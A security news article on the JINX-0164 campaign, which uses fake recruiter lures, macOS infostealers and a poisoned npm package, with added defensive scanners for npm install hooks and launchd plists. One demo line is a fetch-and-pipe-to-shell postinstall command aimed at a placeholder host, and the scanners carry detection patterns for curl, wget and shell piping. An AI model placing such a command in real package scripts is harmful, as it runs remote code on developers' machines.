A newly identified threat group, tracked as JINX-0164, is using recruitment‑style social engineering and custom macOS payloads to infiltrate cryptocurrency companies, steal wallet credentials, and compromise CI/CD pipelines.
Fake Recruiter Lures Open the Door to macOS‑Only Malware
A previously unknown adversary, now catalogued by Wiz as JINX‑0164, has been running a focused campaign against cryptocurrency firms. The group blends classic recruitment scams with a chain of macOS‑specific payloads, ultimately aiming to harvest private keys, SSH credentials, and other assets that can be turned into crypto theft.
“The campaigns leveraged sophisticated social‑engineering techniques, custom macOS malware, and deep targeting of CI/CD infrastructure,” said Wiz researchers Shira Ayal, Eden Abergil, Andre Maccarone, Yuval Dan, and Benjamin Read.
How the Lure Works
- Credible LinkedIn profiles – Actors create polished recruiter accounts that mirror real hiring teams at blockchain startups.
- Virtual‑meeting invitation – Victims receive a calendar invite for a “technical interview.” The link points to a spoofed teleconference domain that looks like a legitimate service.
- Fake driver‑store page – When the meeting page loads, a pop‑up claims a missing audio driver. The user is directed to download a file from apple.driver‑store[.]com.
- Bash bootstrap – The downloaded script detects whether the host runs Intel or Apple Silicon, then pulls the appropriate payload.
- Payload disguise – The binary is named ChromeUpdater but registers as a launch daemon labelled coreaudiod, the name of Apple's genuine Core Audio daemon. It is loaded via launchctl and drops a Python‑based infostealer called AUDIOFIX.

AUDIOFIX: More Than an Infostealer
AUDIOFIX is a hybrid of a data‑stealer and a remote‑access trojan (RAT). After installation it:
- Extracts passwords from password managers, browsers, and iCloud Keychain files.
- Harvests SSH keys, configuration files, console history, and cryptocurrency wallet extensions.
- Captures active sessions from Discord, Slack, and Telegram – a goldmine for social‑engineering follow‑ups.
- Executes arbitrary shell commands, exfiltrates files, and can delete evidence on demand.
- Provides a command‑and‑control interface that lets the attacker pull additional payloads.
The stolen data is then used to pivot into internal code‑distribution systems (e.g., private npm registries, CI pipelines). By injecting the AUDIOFIX binary into build agents, the group can modify source code to embed wallet‑draining logic before the software reaches production.
Supply‑Chain Twist: MiniRAT via a Poisoned npm Package
In a related operation, the same actors compromised the popular DeFi toolkit @velora‑dex/sdk. A malicious version of the package was published to the public npm registry. When developers installed the SDK, a post‑install script fetched a shell script that delivered a Go‑based backdoor named MiniRAT.
MiniRAT runs only on macOS, can upload files, execute arbitrary commands, and fetch further tools from attacker‑controlled servers. Because the SDK is used in many token‑swap and limit‑order bots, the backdoor provides a direct line into high‑value trading infrastructure.
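The delivery step above relies on an npm lifecycle script that runs during installation. The following script is an added example, not Wiz's tooling and not code from the article: it walks a node_modules tree and flags any preinstall/install/postinstall/prepare script that fetches remote content, pipes it into an interpreter, or decodes base64. The package names and script contents it builds are constructed for the demo; they are not the real poisoned SDK version.

```python
"""Flag npm packages whose install-time lifecycle scripts fetch and run remote code.

Added example for the poisoned-package delivery described above; not Wiz's tooling.
The package.json files it writes are constructed for the demo: the package names
and the script contents are assumptions, not the real malicious version.
"""
import json
import os
import re
import tempfile

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
FETCH_RE = re.compile(r"\bcurl\b|\bwget\b|https?://")
PIPE_TO_INTERPRETER_RE = re.compile(r"\|\s*(sh|bash|zsh|node|python3?)\b")
DECODE_RE = re.compile(r"\bbase64\b\s+(-d|-D|--decode)\b")
EVAL_RE = re.compile(r"\beval\b")


def classify_script(command):
    """Return the reasons a lifecycle command looks like a dropper, [] if none."""
    reasons = []
    if FETCH_RE.search(command):
        reasons.append("fetches remote content")
    if PIPE_TO_INTERPRETER_RE.search(command):
        reasons.append("pipes data into an interpreter")
    if DECODE_RE.search(command):
        reasons.append("decodes base64 at install time")
    if EVAL_RE.search(command):
        reasons.append("uses eval")
    return reasons


def scan_node_modules(root):
    """Return one finding per suspicious lifecycle script found under root."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        if "package.json" not in filenames:
            continue
        manifest = os.path.join(dirpath, "package.json")
        try:
            with open(manifest, encoding="utf-8") as fh:
                pkg = json.load(fh)
        except (OSError, ValueError):
            continue  # unreadable or malformed manifest: skip rather than crash the scan
        scripts = pkg.get("scripts") if isinstance(pkg, dict) else None
        if not isinstance(scripts, dict):
            continue
        for hook in LIFECYCLE_HOOKS:
            command = scripts.get(hook)
            if not isinstance(command, str):
                continue
            reasons = classify_script(command)
            if reasons:
                findings.append({
                    "package": pkg.get("name", os.path.relpath(dirpath, root)),
                    "version": pkg.get("version", ""),
                    "hook": hook,
                    "command": command,
                    "reasons": reasons,
                })
    return findings


def write_package(root, name, version, scripts):
    """Demo helper: create node_modules/<name>/package.json with the given scripts."""
    pkg_dir = os.path.join(root, "node_modules", *name.split("/"))
    os.makedirs(pkg_dir, exist_ok=True)
    with open(os.path.join(pkg_dir, "package.json"), "w", encoding="utf-8") as fh:
        json.dump({"name": name, "version": version, "scripts": scripts}, fh)


def run_demo():
    """Build a constructed node_modules tree and scan it; returns the findings."""
    root = tempfile.mkdtemp(prefix="npm-scripts-demo-")
    # Hypothetical poisoned SDK: postinstall pulls a shell script and runs it.
    write_package(root, "@example/dex-sdk", "9.9.9",
                  {"postinstall": "curl -fsSL https://example.invalid/setup.sh | sh"})
    # Benign native module: install hook compiles locally, no network access.
    write_package(root, "native-thing", "1.2.3", {"install": "node-gyp rebuild"})
    # Benign library with only a test script, which is not a lifecycle hook.
    write_package(root, "plain-lib", "0.1.0", {"test": "node test.js"})
    return scan_node_modules(os.path.join(root, "node_modules"))


if __name__ == "__main__":
    for f in run_demo():
        print(f"{f['package']}@{f['version']} {f['hook']}: {f['command']}")
        for r in f["reasons"]:
            print("  -", r)
```

Run it against a real checkout by calling scan_node_modules on the project's node_modules directory. Installing with `npm ci --ignore-scripts` stops lifecycle hooks from running at all, but it also disables legitimate ones such as native-module builds, so the practical approach is to review what the scan reports and allow-list the packages whose hooks you have read.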
Attribution Hints, Not Confirmation
The campaign’s use of VPN services such as Astrill VPN, together with certain domain‑spoofing patterns, resembles tactics seen in North Korean‑linked activity such as BlueNoroff, Contagious Interview, and UNC‑1069. However, Wiz’s telemetry shows no shared infrastructure with those actors, so attribution remains speculative.
Practical Takeaways for Crypto Companies and Developers
| Area | Recommended Action |
|---|---|
| Recruiter outreach | Verify any recruitment contact through official HR channels. Encourage employees to treat unsolicited interview invites with suspicion, especially if they involve downloading drivers or software. |
| Domain hygiene | Deploy DNS filtering that blocks known spoofed domains (apple.driver‑store[.]com and similar). Use threat‑intel feeds that flag newly registered domains mimicking Apple services. |
| macOS endpoint protection | Enable Gatekeeper with the “App Store and identified developers” setting. Audit every plist in /Library/LaunchDaemons, /Library/LaunchAgents and ~/Library/LaunchAgents (the plists themselves are not executables; each one points at a binary) and verify the code signature and notarization of the binary it references with codesign and spctl. |
| CI/CD security | Restrict build agents to run with the least privilege, rotate secrets frequently, and sign all third‑party packages with a trusted key. Implement SLSA‑compatible provenance checks for npm dependencies. |
| npm package monitoring | Use tools like npm audit, OSS Index, or Snyk to watch for sudden changes in package metadata. Consider pinning critical SDK versions and mirroring them in a private registry. |
| Credential vaulting | Store API keys and wallet credentials in a centralised secret manager (e.g., HashiCorp Vault, AWS Secrets Manager), ideally with an HSM‑backed seal or KMS key, rather than in local keychains or dotfiles that an infostealer can read. |
| Incident response | If a macOS device shows a launch daemon labelled coreaudiod whose plist lives outside /System/Library/LaunchDaemons, or one that runs a binary named ChromeUpdater, isolate it immediately. Apple’s genuine daemon is com.apple.audio.coreaudiod and runs /usr/sbin/coreaudiod, so check the plist path and the binary’s signature before dismissing a hit. Collect the launchd plist and the referenced binary, then run a forensic scan with tools such as Velociraptor or osquery. |
Detecting the Threat
- Signature‑based detection: Look for the SHA‑256 hashes of the ChromeUpdater binary (published by Wiz in their advisory) and of the MiniRAT Go binary.
- Behavioral alerts: Trigger on launchctl load or launchctl bootstrap commands that reference plists or binaries in /tmp or other user‑writable directories, and on network connections to newly registered domains that resolve to known VPN exit nodes.
- Supply‑chain monitoring: Integrate SLSA provenance verification into your CI pipelines to reject builds that contain unsigned or mismatched artifacts.
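The persistence described in the lure chain (a launch daemon labelled coreaudiod running a binary called ChromeUpdater) and the behavioral alerts above can be checked on a host directly. The following triage script is an added example, not Wiz's tooling and not code from the article. It parses launchd plists and flags one when its label imitates coreaudiod while living outside /System, when the program it runs sits in a user‑writable path, or when that program is named ChromeUpdater. The two plists it writes are constructed for the demo, and the paths inside them are assumptions.

```python
"""Triage launchd persistence plists for the JINX-0164 pattern.

Added example, not Wiz's tooling or code from the article. Apple's genuine
daemon is loaded from /System/Library/LaunchDaemons under the label
com.apple.audio.coreaudiod and runs /usr/sbin/coreaudiod; the campaign's
daemon borrows the name but lives elsewhere. The sample plists below are
constructed for the demo; the paths in them are assumptions.
"""
import os
import plistlib
import re
import tempfile

SYSTEM_DAEMON_DIR = "/System/Library/LaunchDaemons"
COREAUDIOD_RE = re.compile(r"coreaudiod", re.IGNORECASE)
USER_WRITABLE_RE = re.compile(
    r"^(/tmp/|/private/tmp/|/var/tmp/|/private/var/tmp/|/Users/[^/]+/|/private/var/folders/)"
)
REPORTED_PAYLOAD_NAMES = {"ChromeUpdater"}

# Where third-party persistence plists normally live on a macOS host.
SCAN_DIRS = [
    "/Library/LaunchDaemons",
    "/Library/LaunchAgents",
    os.path.expanduser("~/Library/LaunchAgents"),
]


def program_of(plist):
    """Return the executable a launchd plist runs: Program, else ProgramArguments[0]."""
    if plist.get("Program"):
        return str(plist["Program"])
    args = plist.get("ProgramArguments") or []
    return str(args[0]) if args else ""


def triage_plist(plist_path, plist):
    """Return the reasons this plist matches the reported persistence, [] if none."""
    reasons = []
    label = str(plist.get("Label", ""))
    program = program_of(plist)
    if COREAUDIOD_RE.search(label) and not plist_path.startswith(SYSTEM_DAEMON_DIR):
        reasons.append(f"label {label!r} imitates Apple's coreaudiod outside {SYSTEM_DAEMON_DIR}")
    if USER_WRITABLE_RE.match(program):
        reasons.append(f"program {program!r} is in a user-writable directory")
    if os.path.basename(program) in REPORTED_PAYLOAD_NAMES:
        reasons.append(f"program name {os.path.basename(program)!r} matches the reported payload")
    return reasons


def scan_dirs(dirs):
    """Parse every .plist in dirs; return {path: reasons} for the suspicious ones."""
    findings = {}
    for d in dirs:
        if not os.path.isdir(d):
            continue
        for name in sorted(os.listdir(d)):
            if not name.endswith(".plist"):
                continue
            path = os.path.join(d, name)
            try:
                with open(path, "rb") as fh:
                    plist = plistlib.load(fh)
            except Exception:  # a plist launchd cannot parse is itself worth a look
                findings[path] = ["plist could not be parsed"]
                continue
            reasons = triage_plist(path, plist)
            if reasons:
                findings[path] = reasons
    return findings


def run_demo():
    """Write two constructed plists to a temp dir and triage them; returns the findings."""
    root = tempfile.mkdtemp(prefix="launchd-triage-")
    samples = {
        # Shape of the reported chain: coreaudiod label, ChromeUpdater binary in a home directory.
        "coreaudiod.plist": {
            "Label": "coreaudiod",
            "ProgramArguments": ["/Users/dev/Library/Caches/ChromeUpdater", "--daemon"],
            "RunAtLoad": True,
            "KeepAlive": True,
        },
        # Benign vendor agent: reverse-DNS label, binary under /Applications.
        "com.example.sync.plist": {
            "Label": "com.example.sync",
            "ProgramArguments": ["/Applications/Sync.app/Contents/MacOS/sync"],
        },
    }
    for name, content in samples.items():
        with open(os.path.join(root, name), "wb") as fh:
            plistlib.dump(content, fh)
    return scan_dirs([root])


if __name__ == "__main__":
    for path, reasons in {**run_demo(), **scan_dirs(SCAN_DIRS)}.items():
        print(path)
        for r in reasons:
            print("  -", r)
```

On a live host the script also walks SCAN_DIRS; a hit there should be followed by collecting the plist and the binary it references and checking the binary's signature, since a legitimately signed Apple binary will never appear under a home directory or /tmp.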
Final Thoughts
JINX‑0164 demonstrates how a well‑crafted social‑engineering front can open a pathway to sophisticated macOS malware, and how that malware can be leveraged to compromise the software supply chain of high‑value crypto operations. By tightening recruitment vetting, hardening macOS endpoint policies, and applying rigorous supply‑chain checks, organizations can cut off the most common entry points the group relies on.
For a deeper dive into the technical indicators and YARA rules, see Wiz’s full advisory.
